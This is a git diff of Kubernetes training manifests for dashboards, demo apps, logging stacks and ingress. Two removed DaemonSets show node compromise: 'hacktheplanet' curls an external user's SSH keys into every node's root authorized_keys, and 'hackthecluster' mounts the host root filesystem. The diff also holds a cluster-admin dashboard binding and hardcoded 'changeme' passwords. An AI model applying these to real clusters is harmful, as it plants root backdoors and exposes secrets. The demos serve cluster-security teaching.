app.kubernetes.io/component: kubernetes-dashboard
template:
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
containers:
- name: kubernetes-dashboard
image: "kubernetesui/dashboard:v2.3.1"
imagePullPolicy: IfNotPresent
args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --metrics-provider=none
ports:
- name: https
containerPort: 8443
protocol: TCP
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
---
# Source: kubernetes-dashboard/templates/clusterrole-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/ingress.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/networkpolicy.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/pdb.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/psp.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:cluster-admin
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: cluster-admin
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: ServiceAccount
metadata:
creationTimestamp: null
name: cluster-admin
namespace: kubernetes-dashboard

View File

@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,69 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: cerebro
name: cerebro
spec:
selector:
matchLabels:
app: cerebro
template:
metadata:
labels:
app: cerebro
spec:
volumes:
- name: conf
configMap:
name: cerebro
containers:
- image: lmenezes/cerebro
name: cerebro
volumeMounts:
- name: conf
mountPath: /conf
args:
- -Dconfig.file=/conf/application.conf
env:
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
---
apiVersion: v1
kind: Service
metadata:
labels:
app: cerebro
name: cerebro
spec:
ports:
- port: 9000
protocol: TCP
targetPort: 9000
selector:
app: cerebro
type: NodePort
---
apiVersion: v1
kind: ConfigMap
metadata:
name: cerebro
data:
application.conf: |
secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"
hosts = [
{
host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
name = "demo"
auth = {
username = "elastic"
password = ${?ELASTICSEARCH_PASSWORD}
}
}
]

View File

@@ -1,19 +0,0 @@
apiVersion: elasticsearch.k8s.elastic.co/v1
kind: Elasticsearch
metadata:
name: demo
namespace: eck-demo
spec:
http:
tls:
selfSignedCertificate:
disabled: true
nodeSets:
- name: default
count: 1
config:
node.data: true
node.ingest: true
node.master: true
node.store.allow_mmap: false
version: 7.5.1

View File

@@ -1,168 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: eck-demo
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.inputs:
- type: container
paths:
- /var/log/containers/*.log
processors:
- add_kubernetes_metadata:
host: ${NODE_NAME}
matchers:
- logs_path:
logs_path: "/var/log/containers/"
# To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# node: ${NODE_NAME}
# hints.enabled: true
# hints.default_config:
# type: container
# paths:
# - /var/log/containers/*${data.kubernetes.container.id}.log
processors:
- add_cloud_metadata:
- add_host_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
hostNetwork: true
dnsPolicy: ClusterFirstWithHostNet
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat:7.5.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: demo-es-http
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
- name: varlog
mountPath: /var/log
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: varlog
hostPath:
path: /var/log
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: eck-demo
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
---

View File

@@ -1,17 +0,0 @@
apiVersion: kibana.k8s.elastic.co/v1
kind: Kibana
metadata:
name: demo
spec:
version: 7.5.1
count: 1
elasticsearchRef:
name: demo
namespace: eck-demo
http:
service:
spec:
type: NodePort
tls:
selfSignedCertificate:
disabled: true

File diff suppressed because it is too large Load Diff

View File

@@ -3,9 +3,9 @@ apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: fluentd
@@ -19,9 +19,10 @@ rules:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: fluentd
roleRef:
@@ -32,22 +33,23 @@ subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: fluentd
namespace: default
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
selector:
matchLabels:
app: fluentd
template:
metadata:
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
@@ -56,7 +58,7 @@ spec:
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
image: fluent/fluentd-kubernetes-daemonset:elasticsearch
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
@@ -64,12 +66,14 @@ spec:
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
# X-Pack Authentication
# =====================
- name: FLUENT_ELASTICSEARCH_USER
value: "elastic"
- name: FLUENT_ELASTICSEARCH_PASSWORD
value: "changeme"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
resources:
limits:
memory: 200Mi
@@ -90,87 +94,134 @@ spec:
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
namespace: default
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: elasticsearch
run: elasticsearch
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
spec:
containers:
- image: elasticsearch:5
- image: elasticsearch:5.6.8
imagePullPolicy: IfNotPresent
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
namespace: default
selfLink: /api/v1/namespaces/default/services/elasticsearch
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
run: elasticsearch
sessionAffinity: None
type: ClusterIP
---
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: kibana
run: kibana
name: kibana
namespace: default
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: kibana
run: kibana
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
image: kibana:5.6.8
imagePullPolicy: Always
name: kibana
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
name: kibana
namespace: default
selfLink: /api/v1/namespaces/default/services/kibana
spec:
externalTrafficPolicy: Cluster
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
run: kibana
sessionAffinity: None
type: NodePort

View File

@@ -1,21 +0,0 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
name: es
spec:
kibana:
image: docker.elastic.co/kibana/kibana-oss:6.1.3
image-pull-policy: Always
cerebro:
image: upmcenterprises/cerebro:0.7.2
image-pull-policy: Always
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
image-pull-policy: Always
client-node-replicas: 2
master-node-replicas: 3
data-node-replicas: 3
network-host: 0.0.0.0
use-ssl: false
data-volume-size: 10Gi
java-options: "-Xms512m -Xmx512m"

View File

@@ -1,97 +0,0 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
resources: ["cronjobs", "jobs"]
verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets", "deployments"]
verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: elasticsearch-operator
subjects:
- kind: ServiceAccount
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
selector:
matchLabels:
name: elasticsearch-operator
template:
metadata:
labels:
name: elasticsearch-operator
spec:
containers:
- name: operator
image: upmcenterprises/elasticsearch-operator:0.2.0
imagePullPolicy: Always
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
ports:
- containerPort: 8000
name: http
livenessProbe:
httpGet:
path: /live
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 10
readinessProbe:
httpGet:
path: /ready
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 5
serviceAccount: elasticsearch-operator

View File

@@ -1,30 +0,0 @@
kind: Event
apiVersion: v1
metadata:
generateName: hello-
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
kind: Node
apiVersion: v1
name: kind-control-plane
# Note: the uid should be the Node name (not the uid of the Node).
# This might be specific to global objects.
uid: kind-control-plane
type: Warning
reason: NodeOverheat
message: "Node temperature exceeds critical threshold"
action: Hello
source:
component: thermal-probe
#host: node1
#reportingComponent: ""
#reportingInstance: ""

View File

@@ -1,36 +0,0 @@
kind: Event
apiVersion: v1
metadata:
# One convention is to use <objectname>.<timestamp>,
# where the timestamp is taken with a nanosecond
# precision and expressed in hexadecimal.
# Example: web-5dcb957ccc-fjvzc.164689730a36ec3d
name: hello.1234567890
# The label doesn't serve any purpose, except making
# it easier to identify or delete that specific event.
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
### These 5 lines should be updated to refer to an object.
### Make sure to put the correct "uid", because it is what
### "kubectl describe" is using to gather relevant events.
#apiVersion: v1
#kind: Pod
#name: magic-bean
#namespace: blue
#uid: 7f28fda8-6ef4-4580-8d87-b55721fcfc30
type: Normal
reason: BackupSuccessful
message: "Object successfully dumped to gitops repository"
source:
component: gitops-sync
#reportingComponent: ""
#reportingInstance: ""

View File

@@ -1,170 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: kube-system
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.config:
inputs:
# Mounted `filebeat-inputs` configmap:
path: ${path.config}/inputs.d/*.yml
# Reload inputs configs as they change:
reload.enabled: false
modules:
path: ${path.config}/modules.d/*.yml
# Reload module configs as they change:
reload.enabled: false
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# hints.enabled: true
processors:
- add_cloud_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-inputs
namespace: kube-system
labels:
k8s-app: filebeat
data:
kubernetes.yml: |-
- type: docker
containers.ids:
- "*"
processors:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat-oss:7.0.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: elasticsearch-es.default.svc.cluster.local
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
value: changeme
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: inputs
mountPath: /usr/share/filebeat/inputs.d
readOnly: true
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: inputs
configMap:
defaultMode: 0600
name: filebeat-inputs
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: kube-system
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
---

View File

@@ -1,4 +1,4 @@
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
@@ -11,4 +11,4 @@ roleRef:
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
namespace: kube-system

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hackthecluster
spec:
selector:
matchLabels:
app: hackthecluster
template:
metadata:
labels:
app: hackthecluster
spec:
volumes:
- name: slash
hostPath:
path: /
tolerations:
- effect: NoSchedule
operator: Exists
containers:
- name: alpine
image: alpine
volumeMounts:
- name: slash
mountPath: /hostfs
command:
- sleep
- infinity
securityContext:
#privileged: true
capabilities:
add:
- SYS_CHROOT

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
hostPath:
path: /root
tolerations:
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,16 +1,18 @@
global
daemon
maxconn 256
defaults
mode tcp
timeout connect 5s
timeout client 50s
timeout server 50s
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
listen very-basic-load-balancer
frontend the-frontend
bind *:80
server blue color.blue.svc:80
server green color.green.svc:80
default_backend the-backend
backend the-backend
server google.com-80 google.com:80 maxconn 32 check
server ibm.fr-80 ibm.fr:80 maxconn 32 check
# Note: the services above must exist,
# otherwise HAproxy won't start.

View File

@@ -9,7 +9,7 @@ spec:
name: haproxy
containers:
- name: haproxy
image: haproxy:1
image: haproxy
volumeMounts:
- name: config
mountPath: /usr/local/etc/haproxy/

View File

@@ -1,29 +0,0 @@
kind: HorizontalPodAutoscaler
apiVersion: autoscaling/v2beta2
metadata:
name: rng
spec:
scaleTargetRef:
apiVersion: apps/v1
kind: Deployment
name: rng
minReplicas: 1
maxReplicas: 20
behavior:
scaleUp:
stabilizationWindowSeconds: 60
scaleDown:
stabilizationWindowSeconds: 180
metrics:
- type: Object
object:
describedObject:
apiVersion: v1
kind: Service
name: httplat
metric:
name: httplat_latency_seconds
target:
type: Value
value: 0.1

View File

@@ -1,20 +0,0 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: whatever
port:
number: 1234

View File

@@ -1,17 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 1234

View File

@@ -1 +0,0 @@
ingress-v1beta1.yaml

14
k8s/ingress.yaml Normal file
View File

@@ -0,0 +1,14 @@
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: cheddar
spec:
rules:
- host: cheddar.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: cheddar
servicePort: 80

View File

@@ -1,5 +1,5 @@
apiVersion: v1
kind: Pod
Kind: Pod
metadata:
name: hello
namespace: default

View File

@@ -0,0 +1,167 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
